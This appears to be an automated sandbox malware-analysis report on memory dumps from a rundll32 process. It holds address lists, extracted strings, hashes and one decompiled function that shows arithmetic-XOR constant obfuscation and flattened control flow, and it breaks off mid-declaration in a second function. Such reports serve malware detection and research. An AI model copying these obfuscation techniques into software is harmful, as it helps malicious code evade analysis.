0x00438318
0x00438320
0x00438328
0x0043832d
0x00438331
0x00438339
0x00438341
0x00438346
0x0043834b
0x00438353
0x0043835b
0x00438366
0x0043836e
0x00438379
0x00438384
0x0043838f
0x00438397
0x0043839f
0x004383aa
0x004383b2
0x004383ba
0x004383c2
0x004383c7
0x004383cf
0x004383da
0x004383e5
0x004383f0
0x004383fb
0x00438403
0x00438411
0x00438415
0x0043841d
0x00438425
0x00438430
0x00438438
0x00438443
0x0043844e
0x00438456
0x0043845e
0x00438466
0x0043846b
0x00438473
0x00438489
0x0043848e
0x00438497
0x004384a2
0x004384ad
0x004384b8
0x004384c3
0x004384ce
0x004384d9
0x004384e4
0x004384ec
0x004384f7
0x00438502
0x0043850d
0x00438515
0x00438520
0x00438533
0x00438536
0x0043853d
0x00438548
0x00438553
0x00438566
0x0043856d
0x00438578
0x00438580
0x00438588
0x00438590
0x00438598
0x004385a0
0x004385b6
0x004385bd
0x004385c8
0x004385d0
0x004385d8
0x004385dd
0x004385e2
0x004385ea
0x004385f5
0x00438600
0x00438608
0x00438613
0x0043861e
0x00438630
0x00438635
0x0043863e
0x00438649
0x00438654
0x0043865c
0x00438667
0x0043866f
0x00438677
0x00438681
0x00438682
0x00438686
0x0043868e
0x004386a2
0x004386a9
0x004386b4
0x004386bf
0x004386ca
0x004386d5
0x004386e0
0x004386ed
0x004386fc
0x004386ff
0x00438703
0x00438710
0x00438714
0x0043871c
0x00438727
0x0043873d
0x00438744
0x0043874f
0x0043875b
0x00438760
0x00438766
0x00438770
0x00438773
0x00438777
0x0043877f
0x00438787
0x0043878f
0x0043879f
0x004387a3
0x004387ab
0x004387b6
0x004387be
0x004387c9
0x004387d4
0x004387df
0x004387ea
0x004387f6
0x004387fb
0x00438801
0x00438809
0x00438811
0x00438819
0x00438821
0x00438829
0x0043882e
0x00438836
0x0043883e
0x00438846
0x0043884b
0x00438850
0x00438858
0x00438863
0x0043886b
0x00438876
0x0043887e
0x00438886
0x0043888e
0x00438896
0x0043889e
0x004388a6
0x004388af
0x004388b2
0x004388b6
0x004388be
0x004388c6
0x004388ce
0x004388db
0x004388df
0x004388e7
0x004388f2
0x004388fd
0x00438908
0x00438910
0x00438915
0x00438922
0x00438926
0x0043892e
0x00438936
0x0043893e
0x00438946
0x0043894e
0x00438961
0x00438968
0x00438973
0x0043897e
0x00438989
0x00438994
0x0043899f
0x004389aa
0x004389b5
0x004389c0
0x004389cb
0x004389d6
0x004389e1
0x004389ec
0x004389f4
0x004389ff
0x00438a07
0x00438a0b
0x00438a10
0x00438a14
0x00438a1c
0x00438a2f
0x00438a36
0x00438a41
0x00438a4c
0x00438a57
0x00438a62
0x00438a6d
0x00438a7f
0x00438a86
0x00438a8a
0x00438a91
0x00438a91
0x00438a91
0x00438a95
0x00438a95
0x00438a95
0x00438a9b
0x00000000
0x00000000
0x00438aa1
0x00438aa1
0x00438d2c
0x00438d37
0x00438d3c
0x00438d3c
0x00438d3d
0x00438d41
0x00438d42
0x00438d62
0x00438d74
0x00438d79
0x00438d7c
0x00438d81
0x00438d82
0x00438d85
0x00438d88
0x00438d88
0x00438d88
0x00438d8b
0x00438d92
0x00438d92
0x00438d99
0x00438da2
0x00438da5
0x00438daa
0x00438dae
0x00000000
0x00438aa7
0x00438aac
0x00438aae
0x00438c8c
0x00438c92
0x00438cf6
0x00438cf7
0x00438d03
0x00438d04
0x00438d09
0x00438d0c
0x00438d11
0x00438d15
0x00438d16
0x00438d19
0x00000000
0x00438c94
0x00438c94
0x00438c9a
0x00438cdf
0x00438ce5
0x00000000
0x00438c9c
0x00438c9c
0x00438ca2
0x00000000
0x00438ca8
0x00438cba
0x00438cc0
0x00000000
0x00438cc0
0x00438ca2
0x00438c9a
0x00438ab4
0x00438ab4
0x00438bcc
0x00438bd1
0x00438bd8
0x00438be7
0x00438bf2
0x00438bf7
0x00438bfe
0x00438c03
0x00438c04
0x00438c08
0x00438c09
0x00438c17
0x00438c27
0x00438c28
0x00438c2f
0x00438c33
0x00438c3a
0x00438c41
0x00438c4a
0x00438c4b
0x00438c66
0x00438c70
0x00438c73
0x00438c7b
0x00438c7f
0x00438c83
0x00000000
0x00438aba
0x00438ac0
0x00438bb4
0x00438bbb
0x00438bbc
0x00438bc4
0x00000000
0x00438ac6
0x00438acc
0x0043901e
0x00439025
0x00000000
0x00438ad2
0x00438ad8
0x00438b8a
0x00438b90
0x00438b95
0x00438b95
0x00438a91
0x00438a91
0x00438a91
0x00000000
0x00438a91
0x00438ade
0x00438ae4
0x00439007
0x00439007
0x0043900d
0x00438a91
0x00438a91
0x00438a91
0x00000000
0x00438a91
0x00438a91
0x00438aea
0x00438b00
0x00438b01
0x00438b0a
0x00438b0c
0x00438b21
0x00438b23
0x00438b2b
0x00438b2d
0x00438b4f
0x00438b54
0x00438b57
0x00438b5d
0x00439014
0x00439018
0x00439029
0x0043902b
0x00438b63
0x00438b63
0x00438b68
0x00438b68
0x00438b6c
0x00438b6c
0x00438a95
0x00438a95
0x00438a9b
0x00000000
0x00000000
0x00438a9b
0x00438b5d
0x00438b2d
0x00438ae4
0x00438ad8
0x00438acc
0x00438ac0
0x00438ab4
0x00438aae
0x00439033
0x0043903d
0x00438dba
0x00438dba
0x00438dc0
0x00438ff8
0x00439002
0x00000000
0x00438dc6
0x00438dc6
0x00438dcc
0x00438fd4
0x00438fd9
0x00000000
0x00438dd2
0x00438dd2
0x00438dd8
0x00438fbc
0x00438fc3
0x00000000
0x00438dde
0x00438dde
0x00438de4
0x00438f94
0x00438f9c
0x00438f9d
0x00438fa5
0x00000000
0x00438dea
0x00438dea
0x00438df0
0x00438ee8
0x00438eed
0x00438ef4
0x00438f06
0x00438f0b
0x00438f4c
0x00438f61
0x00438f66
0x00438f6a
0x00438f6d
0x00000000
0x00438df6
0x00438df6
0x00438dfc
0x00438e9f
0x00438eb5
0x00438ebc
0x00438ec4
0x00438ecb
0x00438ed0
0x00438ed5
0x00438edd
0x00000000
0x00438e02
0x00438e02
0x00438e08
0x00000000
0x00438e0e
0x00438e1c
0x00438e24
0x00438e57
0x00438e6d
0x00438e72
0x00438e77
0x00438e7f
0x00000000
0x00438e7f
0x00438e08
0x00438dfc
0x00438df0
0x00438de4
0x00438dd8
0x00438dcc
0x00000000
0x00438dc0
0x00438a95

Strings

$Uf., xrefs: 0043841D
x`, xrefs: 0043899F
T, xrefs: 004385E2
BT, xrefs: 00438649
ti, xrefs: 00438497
mb, xrefs: 004384A2
F, xrefs: 0043823E
D2, xrefs: 004383CF
hW, xrefs: 004387A3
P, xrefs: 0043835B
W, xrefs: 004385A0
vj, xrefs: 00438159
fY, xrefs: 004389F4
\L, xrefs: 00438A14
<, xrefs: 00438A4C
#, xrefs: 00438249
{$, xrefs: 004385EA
\|, xrefs: 0043871C
x+-, xrefs: 00438714
l}, xrefs: 00438081
n, xrefs: 0043821C
jg, xrefs: 00438473
h., xrefs: 00438876
7, xrefs: 004381F8

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #$$Uf.$7$<$BT$D2$\L$\|$fY$h.$hW$jg$l}$mb$ti$vj$x+-$x`${$$F$P$T$W$n
API String ID: 0-3542471488
Opcode ID: 6a5daf08f7ef853dd999dd55cbb9a185a3e0526940eb8ddaa42c763c8681f34b
Instruction ID: d8d007f7fc215225c5901e5af18c2d402bc6a99dfc531d80cf69128e2518cc66
Opcode Fuzzy Hash: 6a5daf08f7ef853dd999dd55cbb9a185a3e0526940eb8ddaa42c763c8681f34b
Instruction Fuzzy Hash: 938204715097818BE378CF25C489B9FFBE1BB88304F108A1EE1C9862A1D7B99945CF57

Uniqueness

Uniqueness Score: -1.00%

Function 00431806, Relevance: 27.9, Strings: 22, Instructions: 446
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00431806() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				intOrPtr* _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				unsigned int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				void* _t499;
				intOrPtr _t511;
				intOrPtr* _t513;
				void* _t516;
				void* _t554;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				intOrPtr* _t578;
				intOrPtr* _t579;
				signed int* _t583;
				void* _t586;

				_t583 =  &_v1756;
				_v1600 = 0xf170;
				_v1600 = _v1600 + 0xda8c;
				_t516 = 0x23fcadf5;
				_v1600 = _v1600 ^ 0x0001cbd5;
				_v1728 = 0xe67a;
				_t563 = 0x31;
				_v1728 = _v1728 / _t563;
				_v1728 = _v1728 | 0x44845457;
				_t579 = 0;
				_v1728 = _v1728 + 0xffff77e0;
				_v1728 = _v1728 ^ 0x4483eb2a;
				_v1612 = 0x5383;
				_t564 = 0x6e;
				_v1612 = _v1612 / _t564;
				_v1612 = _v1612 << 4;
				_v1612 = _v1612 ^ 0x00005321;
				_v1644 = 0x68ec;
				_v1644 = _v1644 >> 0xe;
				_v1644 = _v1644 + 0xb62b;
				_v1644 = _v1644 ^ 0x0000c171;
				_v1568 = 0x7a35;
				_t565 = 0x22;
				_v1568 = _v1568 / _t565;
				_v1568 = _v1568 ^ 0x0000594d;
				_v1580 = 0xc1bd;
				_v1580 = _v1580 ^ 0x3e17a97f;
				_v1580 = _v1580 ^ 0x3e17610b;
				_v1632 = 0xfbf3;
				_v1632 = _v1632 | 0xe3b32269;
				_t566 = 0x7b;
				_v1576 = 0;
				_v1632 = _v1632 / _t566;
				_v1632 = _v1632 ^ 0x01d9a38a;
				_v1684 = 0x7f0a;
				_v1684 = _v1684 + 0xffffba22;
				_v1684 = _v1684 + 0xffff4029;
				_v1684 = _v1684 ^ 0xffff116a;
				_v1640 = 0xf5e9;
				_v1640 = _v1640 << 4;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 ^ 0x0529e0ca;
				_v1596 = 0xa3c2;
				_v1596 = _v1596 >> 0xd;
				_v1596 = _v1596 ^ 0x00002478;
				_v1744 = 0x3ce7;
				_v1744 = _v1744 + 0x1ec4;
				_v1744 = _v1744 * 0x61;
				_v1744 = _v1744 + 0xffff2004;
				_v1744 = _v1744 ^ 0x0021cb7d;
				_v1720 = 0xc06f;
				_v1720 = _v1720 + 0x6113;
				_v1720 = _v1720 ^ 0x8c8fec38;
				_v1720 = _v1720 << 3;
				_v1720 = _v1720 ^ 0x64761ae1;
				_v1668 = 0xe25c;
				_v1668 = _v1668 + 0xf44b;
				_v1668 = _v1668 ^ 0x0001ff79;
				_v1572 = 0x6c73;
				_v1572 = _v1572 >> 3;
				_v1572 = _v1572 ^ 0x0000406f;
				_v1624 = 0xe234;
				_v1624 = _v1624 << 9;
				_v1624 = _v1624 + 0xf304;
				_v1624 = _v1624 ^ 0x01c53e34;
				_v1752 = 0xc25c;
				_v1752 = _v1752 | 0xfe5ffd9f;
				_t567 = 0x7f;
				_v1752 = _v1752 * 0x29;
				_v1752 = _v1752 ^ 0xbd5fcd1e;
				_v1676 = 0xdc66;
				_v1676 = _v1676 + 0x58ec;
				_v1676 = _v1676 ^ 0x9e034c07;
				_v1676 = _v1676 ^ 0x9e020e3e;
				_v1660 = 0x40b;
				_v1660 = _v1660 << 0x10;
				_v1660 = _v1660 >> 7;
				_v1660 = _v1660 ^ 0x00083651;
				_v1588 = 0x6188;
				_v1588 = _v1588 << 7;
				_v1588 = _v1588 ^ 0x0030a7cc;
				_v1616 = 0x5d0d;
				_v1616 = _v1616 ^ 0x7298dccb;
				_v1616 = _v1616 | 0xce495452;
				_v1616 = _v1616 ^ 0xfed98e9f;
				_v1700 = 0x2fb8;
				_v1700 = _v1700 * 0x1d;
				_v1700 = _v1700 ^ 0x8a1dc7d3;
				_v1700 = _v1700 ^ 0x8a18cc28;
				_v1656 = 0xf6db;
				_v1656 = _v1656 + 0xffffc3cc;
				_v1656 = _v1656 / _t567;
				_v1656 = _v1656 ^ 0x00005990;
				_v1716 = 0xb5ba;
				_v1716 = _v1716 + 0xffff7029;
				_v1716 = _v1716 + 0x41fd;
				_v1716 = _v1716 ^ 0x186cdad6;
				_v1716 = _v1716 ^ 0x186c8663;
				_v1724 = 0x558c;
				_v1724 = _v1724 >> 0xa;
				_v1724 = _v1724 + 0x654a;
				_v1724 = _v1724 + 0xaeff;
				_v1724 = _v1724 ^ 0x00012937;
				_v1680 = 0xa928;
				_v1680 = _v1680 >> 8;
				_v1680 = _v1680 << 7;
				_v1680 = _v1680 ^ 0x00005436;
				_v1688 = 0xdfdd;
				_v1688 = _v1688 + 0x7162;
				_v1688 = _v1688 + 0xb335;
				_v1688 = _v1688 ^ 0x00024834;
				_v1696 = 0xfeae;
				_v1696 = _v1696 + 0xffffed12;
				_v1696 = _v1696 | 0xbccbbbad;
				_v1696 = _v1696 ^ 0xbccb9441;
				_v1704 = 0x372d;
				_t568 = 0x2a;
				_v1704 = _v1704 * 0x33;
				_v1704 = _v1704 + 0xffffe1fa;
				_v1704 = _v1704 ^ 0x000ae97e;
				_v1708 = 0xae48;
				_v1708 = _v1708 << 5;
				_v1708 = _v1708 ^ 0x6611f6e7;
				_v1708 = _v1708 ^ 0x660414fc;
				_v1620 = 0x59a4;
				_v1620 = _v1620 * 0x66;
				_v1620 = _v1620 / _t568;
				_v1620 = _v1620 ^ 0x00008226;
				_v1756 = 0x5e70;
				_t569 = 0x32;
				_v1756 = _v1756 / _t569;
				_v1756 = _v1756 + 0xc43e;
				_v1756 = _v1756 * 0x28;
				_v1756 = _v1756 ^ 0x001e8ecc;
				_v1636 = 0x58f6;
				_v1636 = _v1636 ^ 0xb179a89b;
				_v1636 = _v1636 ^ 0x0bd8a84c;
				_v1636 = _v1636 ^ 0xbaa15210;
				_v1604 = 0x6acc;
				_v1604 = _v1604 >> 7;
				_v1604 = _v1604 ^ 0x000023d9;
				_v1692 = 0xda26;
				_v1692 = _v1692 << 0x10;
				_v1692 = _v1692 + 0x271;
				_v1692 = _v1692 ^ 0xda267b29;
				_v1648 = 0x7577;
				_v1648 = _v1648 + 0x56f8;
				_v1648 = _v1648 * 0x3c;
				_v1648 = _v1648 ^ 0x002f8e86;
				_v1628 = 0x645b;
				_v1628 = _v1628 / _t569;
				_v1628 = _v1628 | 0xe392b3cb;
				_v1628 = _v1628 ^ 0xe392e996;
				_v1564 = 0x67c9;
				_v1564 = _v1564 | 0x8303045b;
				_v1564 = _v1564 ^ 0x83034b8c;
				_v1712 = 0x613;
				_t570 = 0x52;
				_v1712 = _v1712 * 0x44;
				_v1712 = _v1712 >> 0xb;
				_v1712 = _v1712 ^ 0x0000010f;
				_v1608 = 0xa33e;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 * 0x27;
				_v1608 = _v1608 ^ 0x000062d8;
				_v1664 = 0x32f9;
				_v1664 = _v1664 + 0xfffff9a5;
				_v1664 = _v1664 * 0x3c;
				_v1664 = _v1664 ^ 0x000a1ece;
				_v1584 = 0xae89;
				_v1584 = _v1584 << 4;
				_v1584 = _v1584 ^ 0x000aaa17;
				_v1672 = 0xd88b;
				_v1672 = _v1672 / _t570;
				_t571 = 0x4b;
				_v1672 = _v1672 / _t571;
				_v1672 = _v1672 ^ 0x00000d29;
				_v1592 = 0x757a;
				_v1592 = _v1592 >> 4;
				_v1592 = _v1592 ^ 0x000029eb;
				_v1652 = 0x303b;
				_t572 = 0x4e;
				_v1652 = _v1652 * 0x72;
				_v1652 = _v1652 / _t572;
				_v1652 = _v1652 ^ 0x000f4642;
				_v1740 = 0x57ea;
				_t573 = 0x1f;
				_v1740 = _v1740 / _t573;
				_t574 = 0xe;
				_v1740 = _v1740 / _t574;
				_v1740 = _v1740 >> 0xe;
				_v1740 = _v1740 ^ 0x00000002;
				_v1736 = 0xe268;
				_v1736 = _v1736 >> 0xd;
				_v1736 = _v1736 | 0xdb2ee2c1;
				_t575 = 0x24;
				_t582 = _v1576;
				_t515 = _v1576;
				_v1736 = _v1736 * 0x31;
				_v1736 = _v1736 ^ 0xf3f96815;
				_v1732 = 0xceb7;
				_v1732 = _v1732 * 0x46;
				_v1732 = _v1732 + 0xffff8676;
				_v1732 = _v1732 + 0xffff6f3a;
				_v1732 = _v1732 ^ 0x00377bba;
				_v1748 = 0x4370;
				_t576 = _v1576;
				_v1748 = _v1748 / _t575;
				_v1748 = _v1748 + 0xffff72bf;
				_v1748 = _v1748 + 0xffff059b;
				_v1748 = _v1748 ^ 0xfffe7a29;
				while(1) {
					L1:
					_t554 = 0x5c;
					do {
						L2:
						_t586 = _t516 - 0x23fcadf5;
						if(_t586 > 0) {
							__eflags = _t516 - 0x2c84300e;
							if(_t516 == 0x2c84300e) {
								_t578 =  *0x451088 + 0x38;
								while(1) {
									__eflags =  *_t578 - _t554;
									if( *_t578 == _t554) {
										break;
									}
									_t578 = _t578 + 2;
									__eflags = _t578;
								}
								_t576 = _t578 + 2;
								__eflags = _t578 + 2;
								_t516 = 0x1b2a5cce;
								goto L26;
							} else {
								__eflags = _t516 - 0x2cef997e;
								if(_t516 == 0x2cef997e) {
									_t513 = E00437626(_v1716, _v1724, _v1680, _t576, _v1688, _v1732, _t516,  &_v520, _v1696, _t516, _v1704, _v1708, _t516, _v1740, _v1620, _t515, _v1748, _t516, _v1756, _v1636, _v1736, _t516, _t576);
									_t582 = _t513;
									_t583 =  &(_t583[0x15]);
									__eflags = _t513;
									if(__eflags == 0) {
										goto L13;
									} else {
										_t516 = 0x1b221acf;
										_t579 = 1;
										_v1576 = 1;
										goto L1;
									}
								} else {
									__eflags = _t516 - 0x357f15e1;
									if(_t516 != 0x357f15e1) {
										goto L26;
									} else {
										E00435AB8(_v1664, _v1584, _v1672, _v1592, _t515);
									}
								}
							}
						} else {
							if(_t586 == 0) {
								_push(_t516);
								E0043471A(_v1600,  &_v1040, _v1728, _v1612, _v1644, _v1568, _v1580);
								_t583 =  &(_t583[8]);
								_t516 = 0x16655107;
								while(1) {
									L1:
									_t554 = 0x5c;
									goto L2;
								}
							} else {
								if(_t516 == 0x30f776d) {
									E00435AB8(_v1628, _v1564, _v1712, _v1608, _t582);
									_t583 =  &(_t583[3]);
									L13:
									_t516 = 0x357f15e1;
									while(1) {
										L1:
										_t554 = 0x5c;
										goto L2;
									}
								} else {
									if(_t516 == 0x16655107) {
										_push(0x431308);
										_push(_v1596);
										_push(_v1640);
										_t499 = E00435DFC(_v1632, _v1684, __eflags);
										E0044D4E1( &_v1560, __eflags);
										E004398C5(0x104, __eflags, _v1744, _v1720, _v1668, _v1572, _v1624,  *0x451088 + 0x254, _v1752, _v1676,  &_v1560,  *0x451088 + 0x38, _t499,  &_v1040);
										E00440D6D(_v1660, _v1588, _v1616, _t499);
										_t579 = _v1576;
										_t583 =  &(_t583[0x11]);
										_t516 = 0x2c84300e;
										while(1) {
											L1:
											_t554 = 0x5c;
											goto L2;
										}
									} else {
										if(_t516 == 0x1b221acf) {
											E0043CAA3(_t582, _t515, _v1692, _v1648);
											_t583 =  &(_t583[3]);
											_t516 = 0x30f776d;
											while(1) {
												L1:
												_t554 = 0x5c;
												goto L2;
											}
										} else {
											if(_t516 != 0x1b2a5cce) {
												goto L26;
											} else {
												_t511 = E0044340E(_v1700, _v1656, _t516, _t516, _v1652);
												_t515 = _t511;
												_t583 =  &(_t583[3]);
												if(_t511 != 0) {
													_t516 = 0x2cef997e;
													while(1) {
														L1:
														_t554 = 0x5c;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
						}
						L19:
						return _t579;
						L26:
						__eflags = _t516 - 0x7669d04;
					} while (__eflags != 0);
					goto L19;
				}
			}

0x00431806
0x0043180c
0x00431819
0x00431824
0x00431829
0x00431834
0x00431846
0x0043184b
0x00431851
0x00431859
0x0043185b
0x00431863
0x0043186b
0x0043187d
0x00431882
0x0043188b
0x00431893
0x0043189e
0x004318a9
0x004318b1
0x004318bc
0x004318c7
0x004318d9
0x004318de
0x004318e7
0x004318f2
0x004318fd
0x00431908
0x00431913
0x0043191e
0x00431930
0x00431933
0x0043193a
0x00431941
0x0043194c
0x00431954
0x0043195c
0x00431964
0x0043196c
0x00431977
0x00431987
0x0043198e
0x00431999
0x004319a4
0x004319ac
0x004319b7
0x004319bf
0x004319cc
0x004319d0
0x004319d8
0x004319e0
0x004319e8
0x004319f0
0x004319f8
0x004319fd
0x00431a05
0x00431a15
0x00431a1d
0x00431a25
0x00431a32
0x00431a3a
0x00431a45
0x00431a50
0x00431a58
0x00431a63
0x00431a6e
0x00431a76
0x00431a85
0x00431a88
0x00431a8c
0x00431a94
0x00431a9c
0x00431aa4
0x00431aac
0x00431ab4
0x00431abc
0x00431ac1
0x00431ac6
0x00431ace
0x00431ad9
0x00431ae1
0x00431aec
0x00431af7
0x00431b02
0x00431b0d
0x00431b18
0x00431b25
0x00431b29
0x00431b31
0x00431b39
0x00431b41
0x00431b51
0x00431b55
0x00431b5d
0x00431b65
0x00431b6d
0x00431b75
0x00431b7d
0x00431b85
0x00431b8d
0x00431b92
0x00431b9a
0x00431ba2
0x00431baa
0x00431bb2
0x00431bb7
0x00431bbc
0x00431bc4
0x00431bcc
0x00431bd4
0x00431bdc
0x00431be4
0x00431bec
0x00431bf4
0x00431bfc
0x00431c04
0x00431c11
0x00431c12
0x00431c16
0x00431c1e
0x00431c26
0x00431c2e
0x00431c33
0x00431c3b
0x00431c43
0x00431c56
0x00431c66
0x00431c6d
0x00431c7a
0x00431c88
0x00431c8d
0x00431c91
0x00431ca0
0x00431ca4
0x00431cac
0x00431cb7
0x00431cc2
0x00431ccd
0x00431cd8
0x00431ce3
0x00431ceb
0x00431cf6
0x00431cfe
0x00431d03
0x00431d0b
0x00431d13
0x00431d1e
0x00431d31
0x00431d38
0x00431d43
0x00431d59
0x00431d60
0x00431d6b
0x00431d76
0x00431d81
0x00431d8c
0x00431d97
0x00431da4
0x00431da7
0x00431dab
0x00431db0
0x00431db8
0x00431dc3
0x00431dd3
0x00431dda
0x00431de5
0x00431ded
0x00431dfa
0x00431dfe
0x00431e06
0x00431e11
0x00431e19
0x00431e24
0x00431e34
0x00431e3c
0x00431e41
0x00431e47
0x00431e4f
0x00431e5a
0x00431e62
0x00431e6d
0x00431e7a
0x00431e7b
0x00431e85
0x00431e8b
0x00431e93
0x00431ea1
0x00431ea6
0x00431eb0
0x00431eb5
0x00431ebb
0x00431ec0
0x00431ec5
0x00431ecd
0x00431ed2
0x00431edf
0x00431ee0
0x00431ee7
0x00431eee
0x00431ef2
0x00431efa
0x00431f07
0x00431f0b
0x00431f13
0x00431f1b
0x00431f23
0x00431f31
0x00431f38
0x00431f3c
0x00431f44
0x00431f4c
0x00431f54
0x00431f54
0x00431f56
0x00431f57
0x00431f57
0x00431f57
0x00431f5d
0x00432105
0x0043210b
0x004321da
0x004321e2
0x004321e2
0x004321e5
0x00000000
0x00000000
0x004321df
0x004321df
0x004321df
0x004321e7
0x004321e7
0x004321ea
0x00000000
0x00432111
0x00432111
0x00432117
0x004321ae
0x004321b3
0x004321b5
0x004321b8
0x004321ba
0x00000000
0x004321c0
0x004321c2
0x004321c7
0x004321c8
0x00000000
0x004321c8
0x00432119
0x00432119
0x0043211f
0x00000000
0x00432125
0x0043213c
0x00432141
0x0043211f
0x00432117
0x00431f63
0x00431f63
0x004320c3
0x004320f3
0x004320f8
0x004320fb
0x00431f54
0x00431f54
0x00431f56
0x00000000
0x00431f56
0x00431f69
0x00431f6f
0x004320b1
0x004320b6
0x004320b9
0x004320b9
0x00431f54
0x00431f54
0x00431f56
0x00000000
0x00431f56
0x00431f75
0x00431f7b
0x00431fdc
0x00431fe1
0x00431fe8
0x00431ffa
0x00432008
0x00432063
0x0043207e
0x00432083
0x0043208a
0x0043208d
0x00431f54
0x00431f54
0x00431f56
0x00000000
0x00431f56
0x00431f7d
0x00431f83
0x00431fca
0x00431fcf
0x00431fd2
0x00431f54
0x00431f54
0x00431f56
0x00000000
0x00431f56
0x00431f85
0x00431f8b
0x00000000
0x00431f91
0x00431f9f
0x00431fa4
0x00431fa6
0x00431fab
0x00431fb1
0x00431f54
0x00431f54
0x00431f56
0x00000000
0x00431f56
0x00431f54
0x00431fab
0x00431f8b
0x00431f83
0x00431f7b
0x00431f6f
0x00431f63
0x00432145
0x00432150
0x004321ef
0x004321ef
0x004321ef
0x00000000
0x004321fb

Strings

~, xrefs: 00431C1E
X, xrefs: 00431A9C
;0, xrefs: 00431E6D
h, xrefs: 00431EC5
x$, xrefs: 004319AC
[d, xrefs: 00431D43
], xrefs: 00431AEC
), xrefs: 00431E62
pC, xrefs: 00431F23
-7, xrefs: 00431C04
bq, xrefs: 00431BCC
), xrefs: 00431E47
!S, xrefs: 00431893
h, xrefs: 0043189E
MY, xrefs: 004318E7
p^, xrefs: 00431C7A
<, xrefs: 004319B7
wu, xrefs: 00431D13
W, xrefs: 00431E93
6T, xrefs: 00431BBC
o@, xrefs: 00431A3A
Je, xrefs: 00431B92

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]$!S$)$-7$6T$;0$Je$MY$[d$bq$h$o@$pC$p^$wu$x$$~$)$<$W$X$h
API String ID: 0-3042135141
Opcode ID: fa92db7954c4e08f3459aa332f6cca56dad69c3941f44220e104136f75d433d6
Instruction ID: b5ce541ace024fb284adbe1f23c545b5d4c7dea736c3a8c90e76d5c409eb0f8f
Opcode Fuzzy Hash: fa92db7954c4e08f3459aa332f6cca56dad69c3941f44220e104136f75d433d6
Instruction Fuzzy Hash: 5D3223715093819BE374CF65C989A9FFBE1BBC4358F10891DE2D9862A0D7B98949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00170D7A, Relevance: 27.9, Strings: 22, Instructions: 446COMMON

Download Yara Rule

Strings

W, xrefs: 00171407
;0, xrefs: 001713E1
), xrefs: 001713D6
], xrefs: 00171060
[d, xrefs: 001712B7
x$, xrefs: 00170F20
pC, xrefs: 00171497
Je, xrefs: 00171106
o@, xrefs: 00170FAE
h, xrefs: 00170E12
bq, xrefs: 00171140
X, xrefs: 00171010
!S, xrefs: 00170E07
-7, xrefs: 00171178
h, xrefs: 00171439
<, xrefs: 00170F2B
wu, xrefs: 00171287
), xrefs: 001713BB
6T, xrefs: 00171130
~, xrefs: 00171192
MY, xrefs: 00170E5B
p^, xrefs: 001711EE

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]$!S$)$-7$6T$;0$Je$MY$[d$bq$h$o@$pC$p^$wu$x$$~$)$<$W$X$h
API String ID: 0-3042135141
Opcode ID: 1e04be0b1c495f3d7d80ea5ff648ac88bb8ad58f01bf2bbf98f0a022a624afde
Instruction ID: cb7bd2d6776d220833fcc40af77588f069c81e9b1e693d6756d3c3622f642cfb
Opcode Fuzzy Hash: 1e04be0b1c495f3d7d80ea5ff648ac88bb8ad58f01bf2bbf98f0a022a624afde
Instruction Fuzzy Hash: 8E3222715093819BE378CF65C98AA8FBBF1BBD0344F10891DE2D9862A0D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0043ADAF, Relevance: 24.3, Strings: 19, Instructions: 509
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0043ADAF(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				signed int _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				char _v1588;
				intOrPtr _v1592;
				char _v1596;
				intOrPtr _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
